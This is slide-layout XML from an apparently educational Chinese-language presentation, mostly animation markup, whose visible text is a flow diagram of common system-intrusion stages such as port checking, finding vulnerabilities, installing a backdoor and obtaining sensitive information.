        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="2895600"/>
            <a:ext cx="685800" cy="12192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安装</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>后门</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713737" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="2819400"/>
            <a:ext cx="2133600" cy="12954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获取敏感信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>或者</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>其他攻击目的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713738" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="3276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39" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="3276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0" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="3276600"/>
            <a:ext cx="4572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1" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3276600"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 375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2" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="3200400"/>
            <a:ext cx="838200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 45833"/>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4" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1"/>
              <a:t>入侵系统的常用步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713732"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7137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713742"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713742"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713742"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713742"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71374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13733"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713733"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71373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713738"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713738"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713738"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713738"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713738"/>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13734"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713734"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71373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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="713739"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713739"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713739"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713739"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713739"/>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13735"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="49" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713735"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71373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713740"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713740"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713740"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713740"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71374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13736"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713736"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="64" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713736"/>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8" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="713741"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713741"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713741"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713741"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713741"/>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713737"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="77" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="713737"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7137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2" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713733" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713734" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713735" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713736" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713737" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="713738" grpId="0" animBg="1"/>
      <p:bldP spid="713739" grpId="0" animBg="1"/>
      <p:bldP spid="713740" grpId="0" animBg="1"/>
      <p:bldP spid="713741" grpId="0" animBg="1"/>
      <p:bldP spid="7137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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3200400"/>
            <a:ext cx="685800" cy="12954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端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>判断</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714757" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="1600200"/>
            <a:ext cx="685800" cy="12954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判断</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714758" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="3048000"/>
            <a:ext cx="685800" cy="1524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选择</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>最简</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714759" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4191000"/>
            <a:ext cx="609600" cy="1905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分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>有漏</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
